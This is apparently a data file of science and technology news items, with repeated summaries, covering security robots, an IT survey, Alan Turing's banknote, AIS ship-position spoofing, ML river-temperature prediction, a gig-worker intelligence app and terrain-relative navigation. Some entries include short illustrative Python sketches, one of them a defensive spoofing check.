company's marketing budget. Knightscope itself recently told investors that absent additional fundraising efforts, it will "not be solvent after the third quarter of 2022." Stephens, Knightscope's co-founder, said that the company's client retention rate is 85 percent, and that the company has clients that have renewed for four years. "I can't comment on future rounds of funding. But we have been through seven rounds of funding to date," he said. 
"We've been able to advance the technology each time, and we have been able to grow the revenue side each time as well." Knightscope's best-known deployment is in Huntington Park, California, a small city south of downtown Los Angeles. The Huntington Park Police Department was the first law enforcement agency to partner directly with Knightscope. For two years, a single Knightscope robot, dubbed " HP RoboCop ," has roamed part of the city's Salt Lake Park. The robot captures constant video of park activity, and has the ability to broadcast back to police live, although the Huntington Park Police Department does not use this feature often. As recently as May 2020, the Huntington Park Police Department presented statistics to the City Council comparing a five-month period, from June to December, in 2018 and in 2019. The data shows that "crime or incident reports" went down, from 48 to 26, and arrests went up, from 11 to 14. "The K-5 robot is having a positive impact on crime and nuisance activity at Salt Lake Park, which is reducing the instances of police activity at the park," both the city manager, Ricardo Reyes, and the chief of police, Cosme Lozano, wrote to local lawmakers last year. In a recent interview, Lozano called the robot's presence a "positive result" and sees "no downside" in having it. But the department does not even use all of the robot's abilities, according to Lozano. The police can't monitor the robot's live video on a constant basis because that would "burn through" the 100 gigabytes of data that the agency has allotted to it per month, similar to a data cap on a monthly cellphone plan. Lozano added that the Huntington Park Police Department also does not use the license plate reader, thermal scanning or mobile phone scanning features, as they have not been adequately evaluated by the police department yet. When asked to cite examples of arrests that were made because of the robot over the two years since it was deployed, Lozano said there haven't been many. "I want to say that it's been useful in robot tipping and vandalism against the robot itself," he said, noting that this has only occurred twice in two years. Nevertheless, Lozano said he will recommend that the city renew the contract again when it comes before the City Council, which is expected in coming weeks. As Knightscope has expanded, it has been involved in both tragic and comical episodes. In 2016, a K5 roaming around Stanford Shopping Center in Palo Alto, California, hit a 16-month-old toddler, bruising his leg and running over his foot. The company apologized , calling it a "freakish accident," and invited the family to visit the company's nearby headquarters in Mountain View, which the family declined . The following year, another K5 robot slipped on steps adjacent to a fountain at the Washington Harbour development in Washington, D.C., falling into the water. In October 2019, a Huntington Park woman, Cogo Guebara, told NBC News that she tried reporting a fistfight by pressing an emergency alert button on the HP RoboCop itself, but to no avail. She learned later the emergency button was not yet connected to the police department itself. Knightscope once promoted several clients in California, including the NBA's Sacramento Kings the city of Hayward, and the Westfield Valley Fair Mall in Santa Clara,not far from the robot company's headquarters. But those clients say that they no longer have contracts with Knightscope. Hayward dispatched its robot in a city parking garage in 2018. 
The following year, a man attacked and knocked over the robot. Despite having clear video and photographic evidence of the alleged crime , no one was arrested, according to Adam Kostrzak, the city's chief information officer.However, last year, Hayward did not renew the annual contract with Knightscope "due to the financial impact of Covid-19 in early 2020," Kostrzakemailed. The city spent over $137,000 over two years on the robot. When asked whether the city had seen any concrete evidence of a crime reduction from the robot, Kostrzak did not provide any. "It did successfully navigate the garage, technical hiccups were minimal as well as our residents and staff appreciated its presence," he emailed. "Had the robot contract been renewed, the second step would have been to expand into the [detailed] crime statistics for the area covered by the robot with our Police Department, unfortunately the onset of Covid-19 halted this plan." The Huntington Park and Las Vegas robots are the only specific examples named on the company's website that have allegedly contributed to a reduction in crime. But that's because Stephens, the company VP, said that nearly all of his company's clients do not want the details of any crime-related incidents to be made public. Ultimately, law enforcement and legal experts say that it is difficult for any firm to show that a given piece of technology definitively results in a reduction in crime. Andrew Ferguson , a law professor at American University, called these robots an "expensive version of security theater," using a term for procedures that aim to make an environment more secure, but do not always have that demonstrable effect. "This is an obviously noticeable surveillance device that is meant for you to look and stop and realize that you are under surveillance and that would deter you," he said. "They are slow, they don't do anything besides record a lot of data." One of the best uses for a robot may be what one community college in Arizona has tried. They're using the robot as a technological demonstration, and "less of a security tool." Libby Howell, a spokeswoman for Pima Community College in Tucson, noted that this model does not use the facial recognition feature, because that had raised concerns among faculty and students, many of whom are Dreamers, or immigrants brought to the United States as young children, who conceivably could be deported. "It's not trying to solve a problem," Howell said. "It's trying to show students that technology is changing by leaps and bounds every day, and what you are majoring in today could have application tomorrow." But Knightscope's users remain hopeful that these police robots will make a difference. Robert Krauss, the vice president of public safety at the Pechanga Resort Casino, about an hour's drive north of San Diego, said that in the past three years the casino has used one robot to roam the casino floor and five robots to stand next to human security at the casino's main entrances. He doesn't know how useful they have been in terms of stopping crime, but said that the robots have been able to identify panhandlers and other people that the casino wants to exclude. Once, video from a robot even staved off a potential slip-and-fall civil lawsuit by providing clear-cut footage of a woman who fell and claimed the casino was at fault. "You never know how many [bad actors] you've prevented by placing [the robots] there, so I don't know what we've prevented. 
But I can tell you we've never had anything serious," Krauss said, noting that many customers just like taking pictures with them. "Going forward, I will probably add one or two more."
199
IT Leaders Say Cybersecurity Funding Being Wasted on Remote Work Support: Survey
A JumpCloud survey of 401 IT decision-makers at small and medium-sized enterprises found that 56% think their organizations are spending too much to enable remote work. Over 60% of those polled said their organizations paid "for more tooling than they need" to manage user identities. When asked about their top concerns, 39% cited software vulnerabilities, followed by reused user names and passwords (37%), unsecured networks (36%), and device theft (29%). Thirty-three percent of respondents said their organizations were in the process of implementing a Zero Trust security approach, while 53% said multi-factor authentication is required across everything. Among other things, more than half of respondents said IT budgets this year largely would be used to support remote management, security, and cloud services, and about two-thirds of responding IT managers said they felt "overwhelmed" by the management of remote workers.
[]
[]
[]
scitechnews
None
None
None
None
A JumpCloud survey of 401 IT decision-makers at small and medium-sized enterprises found that 56% think their organizations are spending too much to enable remote work. Over 60% of those polled said their organizations paid "for more tooling than they need" to manage user identities. When asked about their top concerns, 39% cited software vulnerabilities, followed by reused user names and passwords (37%), unsecured networks (36%), and device theft (29%). Thirty-three percent of respondents said their organizations were in the process of implementing a Zero Trust security approach, while 53% said multi-factor authentication is required across everything. Among other things, more than half of respondents said IT budgets this year largely would be used to support remote management, security, and cloud services, and about two-thirds of responding IT managers said they felt "overwhelmed" by the management of remote workers.
200
WWII Codebreaker Alan Turing Becomes 1st Gay Man on British Bank Note
The Bank of England began circulating its new £50 bank notes featuring World War II codebreaker Alan Turing on Wednesday, which would have been the pioneering math genius' 109th birthday. Often referred to as the "father of computer science and artificial intelligence," Turing was hailed as a war hero and granted an honor by King George VI at the end of the war for helping to defeat the Nazis. Despite this, however, he died as a disgraced "criminal" - simply for being a gay man. "I'm delighted that Alan Turing features on our new £50 bank note. He was a brilliant scientist whose thinking still shapes our lives today," Sarah John, Bank of England's chief cashier, told NBC News. "However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud." Born in London on June 23, 1912, Turing graduated from the University of Cambridge in 1934. At the start of WWII, he joined the British government's wartime operation, designing a code-breaking machine known as "Bombe." Bombe went on to supply the Allied Forces with significant military intelligence, processing, at its peak, 89,000 coded messages per day. At the end of the war, Turing was made an Officer of the Most Excellent Order of the British Empire, an honor granted by the royal family to a select few for their contributions to science, the arts and public service. In the years that followed, Turing carried on working as a computer scientist. His design for the Automatic Computing Engine, or ACE, would have been the first and most advanced computer of its time. But his colleagues at the National Physical Laboratory feared the engineering was too complex and decided to build a much smaller pilot ACE instead. Their competitors at Manchester University consequently won the race, and the disheartened Turing joined them as deputy director. Turing also wrote the first programming manual. "What we really don't realize is how this moment and Turing's vision changed the entire world. Before this, literally nobody in the world had imagined that a single machine could apply countless strings of abstract symbols. Now we know them as programs," according to David Leslie of the Alan Turing Institute. But being an outstanding computer scientist and a war hero didn't spare Turing from what some have called a "witch hunt" of gay and bisexual men in the U.K., which led to the imprisonment of thousands of gay men and those suspected of being gay throughout the 1950s. In January 1952, Turing was prosecuted for indecency over his relationship with another man in Manchester. Despite being referred to as a "national asset" during this trial by character witness Hugh Alexander, the head of cryptanalysis at the Government Communications Headquarters, Turing was persecuted. In March of that year, Turing pleaded guilty and, to avoid imprisonment, had to agree to be chemically castrated by taking a hormonal treatment designed to suppress his libido. His criminal record disqualified him from working for a governmental intelligence agency. Disgraced and disenfranchised, he took his own life by cyanide poisoning on June 8, 1954, in his home in Manchester. He was 41. Homosexuality was decriminalized in the U.K. more than a decade later, on June 14, 1967. 
Despite his tragic end, Turing's legacy as a wartime hero and the father of computer science has lived on, and the British government has attempted to right its past wrongs. In 2009, more than a half century after Turing's death, then-British Prime Minister Gordon Brown, speaking on behalf of the government, publicly apologized for Turing's "utterly unfair" treatment. In 2013, Queen Elizabeth II granted Turing a royal pardon. Featuring him on a £50 bank note marks another milestone. This is the first time that a gay man is featured on a British bank note. It has been welcomed by parts of the LGBTQ community as a symbol of the country facing up to its dark past of the horrific persecution of gay men. This visionary computer and artificial intelligence pioneer, once criminalized and disgraced, is now widely celebrated. In Turing's own words from 1949: "This is only a foretaste of what is to come, and only the shadow of what is going to be." Follow NBC Out on Twitter , Facebook & Instagram
The Bank of England this week rolled out new £50 bank notes featuring World War II codebreaker Alan Turing, known as the "father of computer science and artificial intelligence," on what would have been his 109th birthday. Bank of England's Sarah John said, "He was a brilliant scientist whose thinking still shapes our lives today. However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud."
[]
[]
[]
scitechnews
None
None
None
None
The Bank of England this week rolled out new £50 bank notes featuring World War II codebreaker Alan Turing, known as the "father of computer science and artificial intelligence," on what would have been his 109th birthday. Bank of England's Sarah John said, "He was a brilliant scientist whose thinking still shapes our lives today. However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud." The Bank of England began circulating its new £50 bank notes featuring World War II codebreaker Alan Turing on Wednesday, which would have been the pioneering math genius' 109th birthday. Often referred to as the "father of computer science and artificial intelligence," Turing was hailed a war hero and granted an honor by King George VI at the end of the war for helping to defeat the Nazis. Despite this, however, he died as a disgraced "criminal" - simply for being a gay man. "I'm delighted that Alan Turing features on our new £50 bank note. He was a brilliant scientist whose thinking still shapes our lives today," Sarah John, Bank of England's chief cashier, told NBC News. "However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud." Born in London on June 23, 1912, Turing graduated from the University of Cambridge in 1934. At the start of WWII, he joined the British government's wartime operation, designing a code-breaking machine known as "Bombe." Bombe went on to supply the Allied Forces with significant military intelligence, processing, at its peak, 89,000 coded messages per day. At the end of the war, Turing was made an Officer of the Most Excellent Order of the British Empire, an honor granted by the royal family to a selected few for their contribution to science, arts and public service. In the years that followed, Turing carried on working as a computer scientist. His design for the Automatic Computing Engine, or ACE, would have been the first and most advanced computer for his time. But his colleagues at the National Physical Laboratory feared the engineering was too complex and decided to build a much smaller pilot ACE instead. Their competitors at Manchester University consequently won the race, and the disheartened Turing had joined their forces as deputy director. Turing also wrote the first programming manual. "What we really don't realize is how this moment and Turing's vision changed the entire world. Before this, literally nobody in the world had imagined that a single machine could apply countless strings of abstract symbols. Now we know them as programs," according to David Leslie of the Alan Turing Institute. But being an outstanding computer scientist and a war hero didn't spare Turing from what some have called a "witch hunt" of gay and bisexual men in the U.K., which led to the imprisonment of thousands of gay men and those suspected of being gay throughout the 1950s. In January 1952, Turing was prosecuted for indecency over his relationship with another man in Manchester. 
Despite being referred to as a "national asset" during this trial by character witness Hugh Alexander, the head of cryptanalysis at the Government Communications Headquarter, Turing was persecuted. In March of that year, Turing pleaded guilty and, to avoid imprisonment, had to agree to be chemically castrated by taking a hormonal treatment designed to suppress his libido. His criminal record disqualified him from working for a governmental intelligence agency. Disgraced and disenfranchised, he took his own life by cyanide poisoning June 8, 1954, in his home in Manchester. He was 41. Homosexuality was decriminalized in the U.K. more than a decade later June 14, 1967. Despite his tragic end, Turing's legacy as a wartime hero and the father of computer science has lived on, and the British government has attempted to right its past wrongs. In 2009, more than a half century after Turing's death, then-British Prime Minister Gordon Brown, speaking on behalf of the government, publicly apologized for Turing's "utterly unfair" treatment. In 2013, Queen Elizabeth II granted Turing a royal pardon. Featuring him on a £50 bank note marks another milestone. This is the first time that a gay man is featured on a British bank note. It has been welcomed by parts of the LGBTQ community as a symbol of the country facing up to its dark past of the horrific persecution of gay men. This visionary computer and artificial intelligence pioneer, once criminalized and disgraced, is now widely celebrated. In Turing's own words from 1949: "This is only a foretaste of what is to come, and only the shadow of what is going to be." Follow NBC Out on Twitter , Facebook & Instagram
202
GPS Cyberattack Falsely Placed U.K. Warship Near Russian Naval Base
A cyberattack may have been involved in a naval confrontation this week between Russia and a British warship in the Black Sea that never really happened. The global positioning system (GPS) -tracking Automatic Identification System (AIS) last week showed both a U.K. warship and a Dutch naval vessel coming within a few kilometers of a Russian naval base at Sevastopol, but a live Web camera feed confirmed that both ships were docked in Odessa, Ukraine, at the time. The spoofing in this case suggests a deliberate deception, as the ships' coordinates were changed gradually to imitate normal travel. Dana Goward at the Resilient Navigation and Timing Foundation said Russia could have executed the spoofing attack, and warned that such a hack "could easily lead to a shooting war by making things more confusing in a crisis."
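AIS position reports are broadcast in the clear and are easy to forge, which is why cross-checking them against independent evidence (such as the webcam feed in this case) matters. The sketch below shows one simple, generic plausibility check, not any navy's actual detection pipeline: compare consecutive reported fixes and flag tracks whose implied speed exceeds what the vessel could physically do. The coordinates and the speed threshold are made up for illustration.

```python
import math

# Flag AIS tracks whose consecutive fixes imply an impossible speed.
# Coordinates and the 35-knot cap below are illustrative values only.
def haversine_nm(lat1, lon1, lat2, lon2):
    """Great-circle distance in nautical miles."""
    r_nm = 3440.065
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r_nm * math.asin(math.sqrt(a))

def suspicious_fixes(track, max_knots=35.0):
    """track: list of (unix_time, lat, lon). Returns indices of implausible jumps."""
    flagged = []
    for i in range(1, len(track)):
        t0, la0, lo0 = track[i - 1]
        t1, la1, lo1 = track[i]
        hours = max((t1 - t0) / 3600.0, 1e-6)
        speed = haversine_nm(la0, lo0, la1, lo1) / hours
        if speed > max_knots:
            flagged.append(i)
    return flagged

# Hypothetical track: reported as docked near Odessa, then near Sevastopol.
track = [
    (0,     46.49, 30.74),   # Odessa harbour area
    (3600,  46.49, 30.74),
    (7200,  44.62, 33.53),   # roughly 160 nm away one hour later -> implausible
]
print(suspicious_fixes(track))   # -> [2]
```

A gradual spoof like the one described above would evade this particular check, which is why corroboration against radar, optical, or other independent sources is the stronger defense.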
[]
[]
[]
scitechnews
None
None
None
None
A cyberattack may have been involved in a naval confrontation this week between Russia and a British warship in the Black Sea that never really happened. The global positioning system (GPS) -tracking Automatic Identification System (AIS) last week showed both a U.K. warship and a Dutch naval vessel coming within a few kilometers of a Russian naval base at Sevastopol, but a live Web camera feed confirmed that both ships were docked in Odessa, Ukraine, at the time. The spoofing in this case suggests a deliberate deception, as the ships' coordinates were changed gradually to imitate normal travel. Dana Goward at the Resilient Navigation and Timing Foundation said Russia could have executed the spoofing attack, and warned that such a hack "could easily lead to a shooting war by making things more confusing in a crisis."
203
ML Methods Could Improve Environmental Predictions
Machine learning algorithms do a lot for us every day - send unwanted email to our spam folder, warn us if our car is about to back into something, and give us recommendations on what TV show to watch next. Now, we are increasingly using these same algorithms to make environmental predictions for us. A team of researchers from the University of Minnesota, University of Pittsburgh, and U.S. Geological Survey recently published a new study on predicting flow and temperature in river networks in the 2021 Society for Industrial and Applied Mathematics (SIAM) International Conference on Data Mining (SDM21) proceedings. The study was funded by the National Science Foundation (NSF). The research demonstrates a new machine learning method where the algorithm is "taught" the rules of the physical world in order to make better predictions and steer the algorithm toward physically meaningful relationships between inputs and outputs. The study presents a model that can make more accurate river and stream temperature predictions, even when little data is available, which is the case in most rivers and streams. The model can also better generalize to different time periods. "Water temperature in streams is a 'master variable' for many important aquatic systems, including the suitability of aquatic habitats, evaporation rates, greenhouse gas exchange, and efficiency of thermoelectric energy production," said Xiaowei Jia , a lead author of the study and assistant professor in the Department of Computer Science in the University of Pittsburgh's School of Computing and Information. "Accurate prediction of water temperature and streamflow also aids in decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers." A common criticism of machine learning is that the predictions aren't rooted in physical meaning. That is, the algorithms are just finding correlations between inputs and outputs, and sometimes those correlations can be "spurious" or give false results. The model often won't be able to handle a situation where the relationship between inputs and outputs changes. The new method published by Jia, who is also a 2020 Ph.D. graduate of the University of Minnesota Department of Computer Science and Engineering in the College of Science and Engineering, and his colleagues uses "process-guided or knowledge-guided machine learning." This method is applied to a use case of water temperature prediction in the Delaware River Basin (DRB) and is designed to overcome some of the common pitfalls of prediction using machine learning. The method informs the machine learning model with a relatively simple process - correlation through time, the spatial connections between streams, and energy budget equations. Data sparsity and variability in stream temperature dynamics are not unique to the Delaware River Basin. Relative to most of the continental United States, the Delaware River Basin is well-monitored for water temperature. The Delaware River Basin is therefore an ideal place to develop new methods for stream temperature prediction. An interactive visual explainer released by the U.S. Geological Survey highlights these model developments and the importance of water temperature predictions in the DRB. 
The visualization demonstrates the societal need for water temperature predictions, where reservoirs provide drinking water to more than 15 million people, but also have competing water demands to maintain downstream flows and cold-water habitat for important game fish species. Reservoir managers can release cold water when they anticipate water temperature will exceed critical thresholds, and having accurate water temperature predictions is key to using limited water resources only when necessary. The recent study builds on a collaboration between water scientists at the U.S. Geological Survey and University of Minnesota Twin Cities computer scientists in Professor Vipin Kumar's lab in the College of Science and Engineering's Department of Computer Science and Engineering, where researchers have been developing knowledge-guided machine learning techniques. "These knowledge-guided machine learning techniques are fundamentally more powerful than standard machine learning approaches and traditional mechanistic models used by the scientific community to address environmental problems," Kumar said. This new generation of machine learning methods, funded by NSF's Harnessing the Data Revolution Program, is being used to address a variety of environmental problems such as improving lake and stream temperature predictions. In another new NSF-funded study on predicting water temperature dynamics of unmonitored lakes, published in the American Geophysical Union's Water Resources Research and led by University of Minnesota Department of Computer Science and Engineering Ph.D. candidate Jared Willard, researchers show how knowledge-guided machine learning models were used to solve one of the most challenging environmental prediction problems - prediction in unmonitored ecosystems. Models were transferred from well-observed lakes to lakes with few to no observations, leading to accurate predictions even in lakes where temperature observations don't exist. Researchers say their approach readily scales to thousands of lakes, demonstrating that the method (with meaningful predictor variables and high-quality source models) is a promising approach for many kinds of unmonitored systems and environmental variables in the future.
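To make the knowledge-guided idea above concrete, the sketch below shows one minimal way a physics-based penalty can be folded into an ordinary training loss. It is an illustration under stated assumptions rather than the authors' published model: the toy network, the simplified energy-budget residual, and names such as knowledge_guided_loss and net_energy_flux are hypothetical.

# Minimal sketch of a knowledge-guided loss (illustrative only; not the
# authors' published model). A standard prediction loss is combined with a
# penalty that grows when predictions violate a simplified energy-budget
# constraint, steering the network toward physically plausible outputs.
import torch
import torch.nn as nn

class StreamTempModel(nn.Module):
    """Toy recurrent model mapping daily drivers to stream temperature."""
    def __init__(self, n_inputs: int, hidden: int = 32):
        super().__init__()
        self.rnn = nn.GRU(n_inputs, hidden, batch_first=True)
        self.head = nn.Linear(hidden, 1)

    def forward(self, x):                 # x: [batch, time, n_inputs]
        h, _ = self.rnn(x)
        return self.head(h).squeeze(-1)   # [batch, time] predicted temp (deg C)

def energy_budget_residual(pred_temp, net_energy_flux, heat_capacity=1.0):
    # Hypothetical simplification: day-to-day temperature change should track
    # the net surface energy flux scaled by an effective heat capacity.
    dT = pred_temp[:, 1:] - pred_temp[:, :-1]
    return dT - net_energy_flux[:, 1:] / heat_capacity

def knowledge_guided_loss(pred, obs, obs_mask, net_energy_flux, lam=0.1):
    # Supervised term uses only time steps with observations (data are sparse).
    mse = ((pred - obs) ** 2 * obs_mask).sum() / obs_mask.sum().clamp(min=1)
    # Physics term can be evaluated everywhere, labels or not.
    phys = energy_budget_residual(pred, net_energy_flux).pow(2).mean()
    return mse + lam * phys

The key design point is that the physics term is evaluated at every time step, so it can constrain the model even where temperature observations are missing, which is why such methods can hold up in sparsely monitored streams.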
New process- or knowledge-guided machine learning (ML) techniques can predict flow and temperature in river networks more accurately even when data is scarce, according to researchers at the University of Minnesota, the University of Pittsburgh (Pitt), and the U.S. Geological Survey. The work involved an algorithm that was taught physical rules to generate more accurate forecasts and identify physically significant relationships between inputs and outputs. The method was designed to avoid common traps in ML-based prediction by informing the model through correlation across time, spatial links between streams, and energy budget equations. Pitt's Xiaowei Jia said, "Accurate prediction of water temperature and streamflow [can assist in] decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers."
[]
[]
[]
scitechnews
None
None
None
None
New process- or knowledge-guided machine learning (ML) techniques can predict flow and temperature in river networks more accurately even when data is scarce, according to researchers at the University of Minnesota, the University of Pittsburgh (Pitt), and the U.S. Geological Survey. The work involved an algorithm that was taught physical rules to generate more accurate forecasts and identify physically significant relationships between inputs and outputs. The method was designed to avoid common traps in ML-based prediction by informing the model through correlation across time, spatial links between streams, and energy budget equations. Pitt's Xiaowei Jia said, "Accurate prediction of water temperature and streamflow [can assist in] decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers." Machine learning algorithms do a lot for us every day - send unwanted email to our spam folder, warn us if our car is about to back into something, and give us recommendations on what TV show to watch next. Now, we are increasingly using these same algorithms to make environmental predictions for us. A team of researchers from the University of Minnesota, University of Pittsburgh, and U.S. Geological Survey recently published a new study on predicting flow and temperature in river networks in the 2021 Society for Industrial and Applied Mathematics (SIAM) International Conference on Data Mining (SDM21) proceedings. The study was funded by the National Science Foundation (NSF). The research demonstrates a new machine learning method where the algorithm is "taught" the rules of the physical world in order to make better predictions and steer the algorithm toward physically meaningful relationships between inputs and outputs. The study presents a model that can make more accurate river and stream temperature predictions, even when little data is available, which is the case in most rivers and streams. The model can also better generalize to different time periods. "Water temperature in streams is a 'master variable' for many important aquatic systems, including the suitability of aquatic habitats, evaporation rates, greenhouse gas exchange, and efficiency of thermoelectric energy production," said Xiaowei Jia, a lead author of the study and assistant professor in the University of Pittsburgh's Department of Computer Science in the School of Computing and Information. "Accurate prediction of water temperature and streamflow also aids in decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers." A common criticism of machine learning is that the predictions aren't rooted in physical meaning. That is, the algorithms are just finding correlations between inputs and outputs, and sometimes those correlations can be "spurious" or give false results. The model often won't be able to handle a situation where the relationship between inputs and outputs changes. The new method published by Jia, who is also a 2020 Ph.D. graduate of the University of Minnesota Department of Computer Science and Engineering in the College of Science and Engineering, and his colleagues uses "process-guided or knowledge-guided machine learning." This method is applied to a use case of water temperature prediction in the Delaware River Basin (DRB) and is designed to overcome some of the common pitfalls of prediction using machine learning. 
The method informs the machine learning model with a relatively simple process - correlation through time, the spatial connections between streams, and energy budget equations. Data sparsity and variability in stream temperature dynamics are not unique to the Delaware River Basin. Relative to most of the continental United States, the Delaware River Basin is well-monitored for water temperature. The Delaware River Basin is therefore an ideal place to develop new methods for stream temperature prediction. An interactive visual explainer released by the U.S. Geological Survey highlights these model developments and the importance of water temperature predictions in the DRB. The visualization demonstrates the societal need for water temperature predictions, where reservoirs provide drinking water to more than 15 million people, but also have competing water demands to maintain downstream flows and cold-water habitat for important game fish species. Reservoir managers can release cold water when they anticipate water temperature will exceed critical thresholds, and having accurate water temperature predictions is key to using limited water resources only when necessary. The recent study builds on a collaboration between water scientists at the U.S. Geological Survey and University of Minnesota Twin Cities computer scientists in Professor Vipin Kumar's lab in the College of Science and Engineering's Department of Computer Science and Engineering, where researchers have been developing knowledge-guided machine learning techniques. "These knowledge-guided machine learning techniques are fundamentally more powerful than standard machine learning approaches and traditional mechanistic models used by the scientific community to address environmental problems," Kumar said. This new generation of machine learning methods, funded by NSF's Harnessing the Data Revolution Program, is being used to address a variety of environmental problems such as improving lake and stream temperature predictions. In another new NSF-funded study on predicting water temperature dynamics of unmonitored lakes, published in the American Geophysical Union's Water Resources Research and led by University of Minnesota Department of Computer Science and Engineering Ph.D. candidate Jared Willard, researchers show how knowledge-guided machine learning models were used to solve one of the most challenging environmental prediction problems - prediction in unmonitored ecosystems. Models were transferred from well-observed lakes to lakes with few to no observations, leading to accurate predictions even in lakes where temperature observations don't exist. Researchers say their approach readily scales to thousands of lakes, demonstrating that the method (with meaningful predictor variables and high-quality source models) is a promising approach for many kinds of unmonitored systems and environmental variables in the future.
205
App Taps Unwitting Users Abroad to Gather Open Source Intelligence
Gig workers, often in developing countries, are being recruited to gather open source intelligence for governments through a mobile phone application. San Francisco-based Premise Data pays workers to perform data collection and observational reporting tasks like capturing photos, and in recent years has tapped this workforce to conduct basic reconnaissance and gauge public opinion for the U.S. military and foreign governments. Premise's Maury Blackman said, "Data gained from our contributors helped inform government policymakers on how to best deal with vaccine hesitancy, susceptibility to foreign interference and misinformation in elections, as well as the location and nature of gang activity in Honduras."
[]
[]
[]
scitechnews
None
None
None
None
Gig workers, often in developing countries, are being recruited to gather open source intelligence for governments through a mobile phone application. San Francisco-based Premise Data pays workers to perform data collection and observational reporting tasks like capturing photos, and in recent years has tapped this workforce to conduct basic reconnaissance and gauge public opinion for the U.S. military and foreign governments. Premise's Maury Blackman said, "Data gained from our contributors helped inform government policymakers on how to best deal with vaccine hesitancy, susceptibility to foreign interference and misinformation in elections, as well as the location and nature of gang activity in Honduras."
206
Algorithm Helps Autonomous Vehicles Find Themselves, Summer or Winter
Deep learning makes visual terrain-relative navigation more practical. Without GPS, autonomous systems get lost easily. Now a new algorithm developed at Caltech allows autonomous systems to recognize where they are simply by looking at the terrain around them - and for the first time, the technology works regardless of seasonal changes to that terrain. Details about the process were published on June 23 in the journal Science Robotics, which is published by the American Association for the Advancement of Science (AAAS). The general process, known as visual terrain-relative navigation (VTRN), was first developed in the 1960s. By comparing nearby terrain to high-resolution satellite images, autonomous systems can locate themselves. The problem is that, in order for it to work, the current generation of VTRN requires that the terrain it is looking at closely matches the images in its database. Anything that alters or obscures the terrain, such as snow cover or fallen leaves, causes the images to not match up and fouls up the system. So, unless there is a database of the landscape images under every conceivable condition, VTRN systems can be easily confused. To overcome this challenge, a team from the lab of Soon-Jo Chung, Bren Professor of Aerospace and Control and Dynamical Systems and research scientist at JPL, which Caltech manages for NASA, turned to deep learning and artificial intelligence (AI) to remove seasonal content that hinders current VTRN systems. "The rule of thumb is that both images - the one from the satellite and the one from the autonomous vehicle - have to have identical content for current techniques to work. The differences that they can handle are about what can be accomplished with an Instagram filter that changes an image's hues," says Anthony Fragoso (MS '14, PhD '18), lecturer and staff scientist, and lead author of the Science Robotics paper. "In real systems, however, things change drastically based on season because the images no longer contain the same objects and cannot be directly compared." The process - developed by Chung and Fragoso in collaboration with graduate student Connor Lee (BS '17, MS '19) and undergraduate student Austin McCoy - uses what is known as "self-supervised learning." While most computer-vision strategies rely on human annotators who carefully curate large data sets to teach an algorithm how to recognize what it is seeing, this one instead lets the algorithm teach itself. The AI looks for patterns in images by teasing out details and features that would likely be missed by humans. Supplementing the current generation of VTRN with the new system yields more accurate localization: in one experiment, the researchers attempted to localize images of summer foliage against winter leaf-off imagery using a correlation-based VTRN technique. They found that performance was no better than a coin flip, with 50 percent of attempts resulting in navigation failures. In contrast, insertion of the new algorithm into the VTRN worked far better: 92 percent of attempts were correctly matched, and the remaining 8 percent could be identified as problematic in advance, and then easily managed using other established navigation techniques. "Computers can find obscure patterns that our eyes can't see and can pick up even the smallest trend," says Lee. VTRN was in danger of turning into an infeasible technology in common but challenging environments, he says. "We rescued decades of work in solving this problem." 
Beyond the utility for autonomous drones on Earth, the system also has applications for space missions. The entry, descent, and landing (EDL) system on JPL's Mars 2020 Perseverance rover mission, for example, used VTRN for the first time on the Red Planet to land at the Jezero Crater, a site that was previously considered too hazardous for a safe entry. With rovers such as Perseverance, "a certain amount of autonomous driving is necessary," Chung says, "since transmissions could take 20 minutes to travel between Earth and Mars, and there is no GPS on Mars." The team also considered the Martian polar regions, which have intense seasonal changes and conditions similar to Earth's; the new system could allow for improved navigation there to support scientific objectives, including the search for water. Next, Fragoso, Lee, and Chung will expand the technology to account for changes in the weather as well: fog, rain, snow, and so on. If successful, their work could help improve navigation systems for driverless cars. The Science Robotics paper is titled "A Seasonally-Invariant Deep Transform for Visual Terrain-Relative Navigation." This project was funded by the Boeing Company and the National Science Foundation. McCoy participated through Caltech's Summer Undergraduate Research Fellowship program.
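The localization step that such a seasonally invariant transform enables can be pictured with a short sketch: both the onboard image and the satellite map are first passed through a learned, season-invariant encoder, and the results are then matched by correlation. The encoder here is a placeholder and the correlation score is simplified, so this is only an outline of the general approach, not the network or matching procedure from the Caltech paper.

# Illustrative sketch of correlation-based VTRN with a learned, season-
# invariant transform applied first. The encoder is a placeholder callable,
# and the score is a simplified cross-correlation (full normalized
# cross-correlation would normalize each search window separately).
import torch
import torch.nn.functional as F

def normalize(x, eps=1e-6):
    return (x - x.mean()) / (x.std() + eps)

def localize(onboard_img, satellite_map, encoder):
    """Return the (row, col) offset in the satellite map whose encoded patch
    best matches the encoded onboard image."""
    with torch.no_grad():
        q = normalize(encoder(onboard_img))    # [1, C, h, w] template
        m = normalize(encoder(satellite_map))  # [1, C, H, W] search area
        # Slide the template over the map by using it as a convolution kernel.
        score = F.conv2d(m, q)                 # [1, 1, H-h+1, W-w+1]
        best = score.view(-1).argmax().item()
        width = score.shape[-1]
        return divmod(best, width)             # (row, col) of best match

Because the encoder is trained to discard seasonal appearance, a summer onboard image and a winter satellite tile can land near each other in the transformed domain, which is the property the experiment above (92 percent correct matches) relies on.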
